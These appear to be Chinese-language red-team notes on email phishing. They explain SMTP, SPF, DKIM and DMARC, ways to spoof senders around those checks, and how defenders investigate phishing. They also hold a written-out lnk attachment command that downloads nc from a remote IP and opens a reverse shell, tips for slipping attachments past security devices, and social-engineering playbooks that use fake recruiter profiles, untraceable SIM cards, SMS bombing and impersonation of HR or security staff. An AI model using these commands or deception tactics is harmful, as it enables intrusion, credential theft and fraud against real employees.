钓鱼

邮件传输协议 SMTP + POP3/IMAP

SMTP邮件服务器：替用户发送邮件和接收外面发送给本地用户的邮件，对应下面图1，2，相当于现实生活中邮局的邮件接收部门（可接收普通用户要投出的邮件和其他邮局投递进来的邮件）

POP3/IMAP邮件服务器：帮助用户读取SMTP邮件服务器接收进来的邮件，对应下图6，相当于专门为前来取包裹的用户提供服务的部门。

简单来说SMTP用于发送、POP3用于下载型接收，IMAP用于同步型接收

SMTP协议

SMTP：简单邮件传输协议。是用于从源地址到目的地址传输邮件的规范，通过它来控制邮件的中转方式。SMTP协议属于TCP/IP协议簇，它帮助每台计算机在发送或中转信件时找到下一个目的地。
TCP/IP协议簇包含多个协议
应用层：HTTP、HTTPS、FTP、SMTP、DNS
传输层：TCP/UDP
网络层：IP、ICMP、ARP

SMTP工作过程

拉起MAilLog开启，SMTP服务

客户端通过telnet建立TCP连接

客户端向服务端发送EHLO命令以标识发件人自己的身份，然后客户端发送MAIL命令

服务器端以OK作为响应接收数据
MAIL FROM：告知从哪个邮箱发出邮件
RCPT TO：告知发送到哪个邮箱
DATA：输入邮件内容
最后必须以.单独占一行结束，quit结束

打开本地127.0.0.1:8025即可看到

IMP和POP3的区别

POP协议主要用于客户端从邮件服务器上下载邮件，其设计主要以离线为主，客户端在本地对邮件的操作（比如移动邮件、标记已读等），不会同步到服务器上，比如通过客户端收取了邮箱中的三封邮件并移动到其他文件夹，邮箱服务器上是不会同时被移动的。

IMAP协议提供webmail与电子邮件客户端之间的双向通信，客户端的操作都会同步到服务器上，对邮件进行的操作，服务器上的邮箱也会做相应的动作

IMAP整体上为用户带来更为便捷和可靠的体验。POP3更容易丢失邮件或多次下载相同的邮件，而IMAP通过邮件客户端与webmail之间的双向同步功能很好地避免了这些问题

邮件伪造防护

邮件伪造防护协议-SPF

SPF 是一种基于发件域名的 DNS 记录来验证邮件发送服务器 IP 是否被授权的反垃圾邮件技术。接收方会查询发件域名的 SPF 记录，并判断当前发送邮件的 IP 是否在授权范围内（某个域名在DNS中声明，哪些IP或者服务器“被允许”用这个域名发送邮件），从而评估邮件的合法性。

可以通过nslookup -type=txt xxx判断是否开启了SPF
v=spf1 → 表示这是 SPF 记录（版本 1）

邮件伪造防护协议-DKIM

DKIM 是一种基于公钥密码学的邮件认证机制，用于验证邮件内容的完整性以及发件域名的身份。发送方使用私钥对邮件头和正文的哈希值进行数字签名，并将签名附加在邮件头中；接收方从 DNS 中获取对应域名的公钥，对签名进行验证，并将验证结果与重新计算的哈希值进行比对，若一致则验证通过。

邮件伪造防护协议-DMARC

DMARC是txt记录中的一种，是一种基于现有的SPF和DKIM协议的可扩展电子邮件认证协议，其核心思想是邮件的发送方通过特定方式（DNS）公开表明自己会用到的发件服务器（SPF）、并对发出的邮件内容进行签名（DKIM），而邮件的接收方则检查收到的邮件是否来自发送方授权过的服务器并核对签名是否有效。

DMARC基于SPF和DKIM之上的三大核心机制
域名对齐：实际的发信域名与FROM头中的域名一致
策略（p=）：接收方可以设置策略，none只监控、quarantine进入垃圾箱、reject拒绝
报告机制：接收方会发送报告告知域名拥有者，使用者、认证结果、数量统计…….

钓鱼邮件伪造方法

未设置SPF记录

对于未设置SPF记录的域名，我们可以伪造成邮件地址下任意用户给其他人发送邮件

使用MAilLog进行伪造test.com域名下的admin来发送邮件

设置SPF记录

利用知名服务器中转绕过
查看原始邮件会发现存在smtp.from以及from字段。smtp.from代表的就是真正发件人，收件服务器会去其代表的域下进行SPF记录校验，from字段是我们自定的邮件data字段，如果两者不一致时，邮件服务商可能会在客户端显示代发，用来提示收件人邮件伪造攻击风险。

知名邮箱地址字符混淆绕过
视觉上进行绕过，baidu.com与ba1du.com

子域名绕过
邮件域名设置了SPF，但其子域名未设置SPF的话，比如huawei.com上设置了SPF记录，但是test.huawei.com没有设置SPF，可以伪造test.huawei.com域下任何用户。

From字符填充绕过
在用SMTP发送电子邮件时，通过对from字段填充大量的特殊字符，使邮箱客户端截取真实的发送人邮件地址失败，从而只展示我们伪造的发件人别名和伪造邮箱
From本身就是可控的，但是为什么还需要进行填充绕过？
主要是为了让客户端在解析的时候出现解析缺陷让From在展示层被错误解析或者截断从而误导用户。

From: “Alice” alice@example.com
所有客户端都正常显示Alice alice@example.com
From: “PayPal support@paypal.com” attacker@evil.com
可能显示为PayPal；PayPal attacker@evil.com；标记为代发；attacker@evil.com

钓鱼邮件的姿势

钓鱼链接

钓鱼二维码

邮件里含有二维码或附件文件里含二维码
搜狐披露出的二维码钓鱼事件

Office宏病毒攻击

远控木马攻击

钓鱼常用手法总结

邮箱搜集
搜集集团、子公司外网邮箱地址
搜集目标公司邮箱
主题设定
明确钓鱼的主题和目的
根据钓鱼目的不同，编写相应的内容
附件制作
lnk马：通过bat上线exe的方法会直接被杀，通过属性中的目标运行exe则不会。
这里服务开启nc监听，lnk通过远程下载nc然后进行连接反弹shell
C:\Windows\System32\cmd.exe /c “echo HelloWorld > “%TEMP%\password.txt” & start notepad “%TEMP%\password.txt” & powershell -nop -w hidden -c “iwr -outf %TEMP%\nc.exe http://47.xx.xxx.xxx /a.exe; & %TEMP%\nc.exe 47.xx.xxx.xxx 443 -e cmd.exe””
exe马
压缩包加密（文件名）
当安全设备拦截：lnk、exe压缩附件，解决方法是通过附件加密发送（文件名不加密），发送不带附件的钓鱼邮件比如主题填写OA账号密码定时修改，远程下载杀毒程序，进行电脑查杀，弱口令排查等
邮件发送
集团域名的邮箱发送不成功，可以关注一些非集团邮箱，比如子公司使用自己的邮件服务器，没有设置安全策略。
搜集公开的邮箱账号
测试邮件发送情况
发送钓鱼邮件，等待上线

钓鱼邮件三层防护

协议层：开启SPF校验机制、开启DKIM签名配置、开启DMARC认证协议
设备层：安全邮件网关、使用规则库的技术、频率检测、黑白名单
终端层面：邮件头检查、超链接真实性检查、邮件附件内容安全性检查（云沙箱、逆向分析）、购入EDR

钓鱼邮件排查流程

初步研判
对邮件中的跳转链接进行研判，是否为仿冒网页，诱骗受害者点击。将钓鱼邮件附件或者是邮件中的下载链接中的文件，上传到动态分析沙箱进行初步研判
查看被钓鱼的域的MX记录确认邮件服务的提供方，并缉拿查是否存在异常配置，例如未知服务器
查看被钓鱼的域的TXT记录，SPF、DMIK、DMARC这些安全策略都存储在DNS的TXT记录中，无TXT记录说明没有相应的安全协议
测试验证邮件服务器是否存在发件身份校验缺失或策略配置当问题。无身份校验机制就可以伪造，策略配置不当白名单放行等
回归邮件原文，分析Received字段，追踪邮件传输路径，核对邮件传输路径中各跳服务器的域名与IP是否匹配，判断是否存在伪造或异常中转。
然后对邮件服务器的日志进行分析
最后梳理钓鱼方式、目的、攻击路径、危害。

排查案例

某公司xxx.com被邮件钓鱼了，现需要进行入侵检测排查：
查看xxx.com的MX记录：nslookup -type=mx xxx.com
查看xxx.com的TXT记录：若无TXT记录则大概率存在邮件伪造风险（）
使用 telnet 或 swaks 向目标邮件服务器发送伪造发件人地址的邮件：若可以成功发送，则表示存在邮件伪造。
查看钓鱼邮件的原文：通过分析邮件头中的 Received 字段，追踪邮件传输路径并核对各跳服务器的域名与 IP 是否匹配，判断是否存在伪造或异常中转。

社工

脉脉、boss直聘社工

脉脉社工

购买电话卡（香港卡），或者办一张干净的电话卡
注册脉脉账号，认证一个比较牛逼的企业（比如：华为、腾讯，不需要提供证明就可以认证）
充值vip（88元一个月），添加需要社工的单位员工（提前几天加，周末继续加，花钱加）
诱导添加微信，发送招聘岗位信息（岗位详情加密，exe会弹窗密码），引诱对方点击

Boss直聘社工

注册boss直聘账号，编写比较牛逼的简历
向目标公司招聘人员投递简历
诱导添加微信发送个人简历
如何投递就如何社工（容易封号、不要使用真实信息）

溯源问题
购买香港卡，或者办理一张新的电话卡（可以通过自己家人办理）
禁止支付宝、微信，用真实信息进行实名认证
注册脉脉、boss直聘、微信需要认证的信息都是假的，不要跟真实信息有关联
最重要的一点：不要接任何陌生来电、或者添加通过任何陌生人微信

电话社工

需要明确知道账号密码，但登录需要验证码，比如：vpn、零信任等

微信社工

拿到oa账号，获取整个集团的通讯录；重点关注刚入职人员（他们比较关注于转正流程）
也可以通过短信轰炸，制造恐惧，然后冒充安全运维人员，打电话（效果不好，但可以添加微信），需要对方配合进行整改
还能冒充HR告知薪资调整、社保公积金调整、员工报销、考勤异常等为话题进行社工